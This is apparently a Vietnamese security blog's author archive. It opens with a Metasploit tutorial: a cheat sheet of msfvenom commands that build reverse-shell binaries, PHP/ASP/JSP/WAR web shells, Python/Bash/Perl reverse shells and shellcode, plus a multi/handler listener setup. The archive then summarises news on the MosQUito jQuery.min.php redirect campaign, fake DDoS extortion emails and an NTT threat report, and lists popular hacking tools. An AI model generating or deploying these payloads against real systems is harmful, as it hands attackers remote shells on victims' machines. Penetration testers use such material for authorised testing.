Author Archives: hungnv

Hướng dẫn sử dụng Metasploit Payloads

Một trong những tính năng hữu ích nhất của Metasploit là msfpayload module. Nhiều payloads có thể được tạo ra với module này và có thể tạo cho bạn shell trong hầu hết mọi tình huống. Đối với mỗi một trong các payloads, bạn có thể dùng msfconsole và chọn exploit/multi/handler, chạy lệnh ‘set payload’ cho các payloads liên quan và cấu hình các tùy chọn cần thiết (LHOST, LPORT, vv), Execute và đợi các payload chạy xong. LHOST thường là IP của bạn(IP Lan nếu trong cùng mạng lan, ip wan nếu attack trên internet).
metasploit payloads
List payloads

msfvenom -l

Binaries

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

Web Payloads

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo ‘<?php ‘ | tr -d ‘\n’ > shell.php && pbpaste >> shell.php

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

Scripting Payloads

Python

msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

Shellcode: Đối với shellcode sử dụng ‘msfvenom –help-formats’ để xem thông tin và các tham số cần thiết

Linux Based Shellcode

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Windows Based Shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Mac Based Shellcode

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Handlers : Handlers should be in the following format.

use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z

Mã khai thác MosQUito đánh cắp traffic từ các trang web WordPress và Joomla

Hacker thay thế jquery.min.js trên các trang web bị hack với một tập tin độc hại có tên là jQuery.min.php

mosquito

Công ty chống gian lận eZanga cho biết họ phát hiện một chiến dịch độc hại đánh cắp traffic tự nhiên và traffic có trả phí từ các doanh nghiệp và chuyển hướng nó vào các trang web bất chính.
Theo các chuyên gia của công ty, điều này xảy ra sau khi hacker đột nhập vào các trang web, thường chạy các CMS như Joomla và WordPress, và thay đổi mã nguồn của chúng.Hacker tìm kiếm trong website nơi chứa thư viện jQuery Javascript, và thay thế file jquery.min.js chuẩn với jQuery.min.php.
file PHP độc hại này sẽ giám sát traffic đến các trang web và chọn ngẫu nhiên một nạn nhân để chuyển hướng đến một trang web khác dưới sự kiểm soát của hacker
Thay jquery.min.js với jQuery.min.php là một thủ thuật cũ. Trong quá khứ, hacker sử dụng nó để chèn các trang web với các liên kết ẩn để tăng thứ hạng SEO của tên miền riêng của chúng.
Quản trị web của các trang web bị hack dần dần mất đi người sử dụng và danh tiếng của trang web của họ. Mạng quảng cáo hiển thị quảng cáo trên các trang web bị mất tiền.
Điều này xảy ra bởi vì kịch bản jQuery.min.php cho phép các trang web bị hack để tải, chờ vài giây, và sau đó chuyển hướng người dùng đến một trang web khác.

eZanga đã công bố danh sách 9.285 trang web bị ảnh hưởng bởi cuộc tấn công này, mà họ đặt tên là MosQUito.

Theo Softpedia

Lừa đảo tấn công DDOS, Armada Collective vẫn kiếm được hàng nghìn dollars

    Một nhóm hacker tự nhận tên Armada Collective, gửi email đến hàng loạt các website và đe dọa DDOS nếu không trả tiền cho chúng qua bitcoin.Cloudflare viết trên blog của mình rằng mối đe dọa này chỉ là giả.

armada-collective-google-search
Cloudflare bắt đầu ghi nhận khách hàng của họ bị email đe dọa từ đầu tháng 3/2016, đến cuối tháng 4, họ vẫn chưa gặp phải một trường hợp tân công DDOS nào từ Armada Collective.
Mặc dù mối đe dọa là giả nhưng nhiều trang web đã thực sự trả tiền để tránh một cuộc tấn công DDOS, và địa chỉ Bitcoin trong email đe dọa kia đã nhận được các giao dịch lên đến $100,000 .

CloudFlare cũng cho biết các khách hàng của họ cuối tháng 4 nhận được email của một nhóm khác tự nhận là Lizard Squad, một nhóm hacker khét tiếng đã tấn công mạng PlayStation và Xbox.

Các mối đe dọa DDOS mới nhất xuất hiện rất giống nhau và thậm chí tái sử dụng các địa chỉ Bitcoin cùng. Một lần nữa, không có cuộc tấn công đã được ghi nhận.CloudFlare sẽ tiếp tục theo dõi tình hình, và sẽ cung cấp update nếu có thay đổi phát triển hơn nữa.

Các cuộc tấn công mạng xuất phát từ địa chỉ IP của Mỹ cao nhất trong ba năm trở lại đây

Theo báo cáo 2016 Global Threat Intelligence Report​ của NTT,Các cuộc tấn công mạng từ địa chỉ IP của Mỹ đã tăng trong năm thứ ba liên tiếp.

NTT-Global-Threat-Intelligence-Report-2016

Báo cáo hàng năm này bao gồm các mối đe dọa bảo mật thu thập trong năm 2015 từ 8.000 khách hàng của công ty bảo bật trong NTT Group bao gồm Dimension Data, Solutionary, NTT Com Security, NTT R&D, and NTT Innovation Institute (NTTi3). Dữ liệu của năm 2016 được dựa trên 3.5 trillion security logs and 6.2 billion attacks. Dữ liệu cũng được thu thập từ 24 trung tâm hoạt động bảo mật và 7 trung tâm nghiên cứu vầ phát triển của NTT Group.

Trong năm 2013, 49% các cuộc tấn công mạng xuất phát từ các địa chỉ IP có nguồn gốc từ trong nước Mỹ, và con số này tăng lên 56% trong năm 2014. Trong năm 2015, con số này tăng lên đáng ngạc nhiên là 65% trên 217 quốc gia phát hiện các cuộc tấn công.

Matthew Gyde, Giám đốc của Dimension Data’s Group cho biết lý do là vì các nhà cung cấp dịch vụ hosting cloud ở mỹ cung cấp dịch vụ khá phổ biến và giá thành rẻ. Trong khi các địa chỉ IP nguồn có trụ sở tại Mỹ, những kẻ tấn công thực tế có thể là bất cứ nơi nào trên thế giới.
Trung Quốc, đó là nguồn gốc của số lượng lớn thứ hai của cuộc tấn công (9%) trong năm 2014, chỉ chiếm 4% các cuộc tấn công vào năm 2015. Australia, ở vị trí thứ ba trong năm 2014, giảm xuống thứ mười một (1%) nguồn của các cuộc tấn công trong năm 2015.
Trong khi đó, Anh đã trở thành số một trong thống kê các cuộc tấn công có nguồn không phải Mỹ dựa vào năm 2015: số lượng các cuộc tấn công từ các địa chỉ trụ sở tại Anh tăng nhẹ từ 3% trong năm 2014, đến 5% vào năm 2015, đưa nước này là nguồn gốc chính của các cuộc tấn công không phải từ Mỹ.

Ngoài ra còn có các điểm nổi bật khác trong báo cáo bao gồm:

  • Các tổ chức trong lĩnh vực bán lẻ bị tấn công nhiều hơn gần gấp ba lần những người trong lĩnh vực tài chính
  • Tương tự như trong lĩnh vực bán lẻ, các khách sạn, giải trí, và khu vực vui chơi giải trí cũng xử lý khối lượng lớn các thông tin nhạy cảm bao gồm cả dữ liệu thẻ tín dụng nên cũng trở nên hấp dẫn với các hacker
  • Tội phạm mạng đang áp dụng các cách tấn công có chi phi thấp, tính sẵn sàng cao để tăng cường hoạt động độc hại.Điều này có thể được nhìn thấy bởi sự gia tăng các cuộc tấn công có nguồn gốc từ Mỹ tận dụng cơ sở hạ tầng điện toán đám mây.

Chi tiết báo cáo xem tại : http://www.dimensiondata.com/Global/Global-Events/Global-Threat-Intelligence-Report-2016/Pages/Home.aspx

Các công cụ hacking tốt nhất năm 2016

1. Metasploit | Best Hacking Tools 2016:

metaspoit-best-hacking-tool-2016

Đây là bộ công cụ miễn phí cho phép kiểm tra an ninh trên nhiều nền tảng khác nhau như web, Window, Linux OSX. Metasploit được phát triển bởi 200.000 người sử dụng, nó có thể giúp bạn tìm kiếm các lỗ hổng an ninh trong hệ thống của mình.

Link: https://www.metasploit.com/
2. Acunetix WVS | Best Hacking Tools 2016:

acunetix-best-hacking-tool-2016

Acunetix Web Vulnerability Scanner(WVS) là công cụ quét và tìm kiếm các lỗ hổng trên website và nó khá quen thuộc. Acunetix có thể phát hiện ra hơn 1200 lỗ hổng an ninh trên nền tảng WordPress. Các lỗ hổng mà công cụ này có thể phát hiện ra là: malicious Cross-site Scripting, SQL injection và nhiều lỗ hổng khác nữa.
Đây có lẽ là công cụ không thể thiếu với bất kỳ chuyên gia an ninh mạng nào với các tính năng tuyệt vời nhưng đáng tiếc nó lại không miễn phí.

Link tham khảo: http://www.acunetix.com/vulnerability-scanner/

3. Nmap | Best Hacking Tools 2016:

zenmap-best-hacking-tool-2016

Nmap – còn được gọi là Network Mapper đây là công cụ quét cổng hiệu quả và phổ biến nhất. Nmap sử dụng các gói IP thôi để phát hiện các máy tính trong mạng, cách dịch vụ, loại tường lửa và các thông tin khác.
Nmap giành được nhiều giải thưởng lớn về an ninh mạng và xuất hiện trong nhiều bộ phim như The Matrix Reloaded, Die Hard 4 …vvv.
Nmap được sử dụng trên các nền tảng Window, Linux, OSX.

Link tham khảo: https://nmap.org/
4. Wireshark | Best Hacking Tools 2016:

wireshark-best-hacking-tool-2016

Wireshark là một công cụ crafting gói tin nổi tiếng được sử dụng bởi hàng ngàn chuyên gia an ninh mạng.
Nó giúp bạn đọc dữ liệu trực tiếp từ Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, FDDI và nhiều giao thức khác.
Công cụ mã nguồn mở miễn phí này còn có phiên bản dòng lệnh kèm theo có tên TShark.

Link: https://www.wireshark.org/
5. oclHashcat | Best Hacking Tools 2016:

oclhashcat-best-hacking-tool-2016

Đây là công cụ bẻ khóa mật khẩu dựa trên các cơ chế:

  • Straight
  • Combination
  • Brute-force
  • Hybrid dictionary + mask
  • Hybrid mask + dictionary

Đây là công cụ bẻ khóa mật khẩu nhanh nhất thế giới dựa trên sức mạnh của GPU máy tính. Đây là công cụ mã nguồn mở theo giấy phép MIT cho phép tích hợp dễ dàng cho các distro linux phổ biến như ubuntu, Fedora…
Hiện công cụ có thể chạy được trên các nền tảng: Window, Linux, OSX.

Link: https://hashcat.net/oclhashcat/
6. Nessus Vulnerability Scanner | Best Hacking Tools 2016:

nessus-best-hacking-tool-2016

Nessus là công cụ hacking miễn phí hàng đầu năm 2016 làm việc với nền tảng client-server. Nessus có các phiên bản phục vụ các mục đích khác nhau – Nessus Home, Nessus Professional, Nessus Manager và Nessus Cloud.

Sử dụng Nessus, người ta có thể quét nhiều loại lỗ hổng mà bao gồm truy cập từ xa phát hiện lỗ hổngremote access flaw detection, misconfiguration alert, denial of services against TCP/IP stack, preparation of PCI DSS audits, malware detection, sensitive data searches…
Ngoài các chức năng cơ bản nêu trên, Nessus có thể được sử dụng để quét nhiều mạng IPv4, IPv6 và hybrid networks. Bạn có thể thiết lập lịch trình quét để chạy theo nhu cầu của mình.

Nessus được hỗ trợ bởi một loạt các nền tảng bao gồm Windows 7 và 8, Mac OS X, và Linux distro phổ biến như Debian, Ubuntu, Kali Linux…

Link: https://www.tenable.com/products/nessus-vulnerability-scanner
7. Maltego | Best Hacking Tools 2016:

Maltego-Screen-best-hacking-tool-2016

Maltego là một công cụ xây dựng trên nền tảng mã nguồn mở khai thác và thu thập thông tin để vẽ một bức tranh về những mối nguy hiểm xung quanh hệ thống IT.

Maltego là một công cụ hacking tuyệt vời mà phân tích các liên kết thế giới thực sự giữa mọi người, các công ty, các trang web, tên miền, tên DNS, địa chỉ IP. Dựa trên Java, công cụ này chạy trong một giao diện đồ họa dễ sử dụng với tùy chọn tùy biến trong khi quét.

Maltego công cụ hacking có sẵn cho các nền tảng Windows, Mac, và Linux.
Link: https://www.paterva.com/web6/products/maltego.php
8. Social-Engineer Toolkit | Best Hacking Tools 2016:

social-engineer-toolkit-best-hacking-tool-2016

Social-Engineer Toolkit(SET) là công cụ chạy dưới dạng dòng lệnh được phát triển trên ngôn ngữ Python.Nó tạo ra các cuộc tấn công như giả mạo email, web độc hại ..vvv

Ngoài Linux nó còn hỗ trợ một phần trên Window và OSX.

Link: https://www.trustedsec.com/social-engineer-toolkit/

Ngoài ra còn có những phần mềm khác để các bạn tham khảo.

Web Vulnerability Scanners – Burp Suite, Firebug, AppScan, OWASP Zed, Paros Proxy

Vulnerability Exploitation Tools – Netsparker, sqlmap, Core Impact, WebGoat, BeEF

Forensic Tools – Helix3 Pro, EnCase, Autopsy

Port Scanners – Unicornscan, NetScanTools, Angry IP Scanner

Traffic Monitoring Tools – Nagios, Ntop, Splunk, Ngrep, Argus

Debuggers – IDA Pro, WinDbg, Immunity Debugger, GDB

Rootkit Detectors – DumpSec, Tripwire, HijackThis

Encryption Tools – KeePass, OpenSSL, OpenSSH/PuTTY/SSH, Tor

Password Crackers – John the Ripper, Aircrack, Hydra, ophcrack

Nguồn tham khảo: fossbytes dot com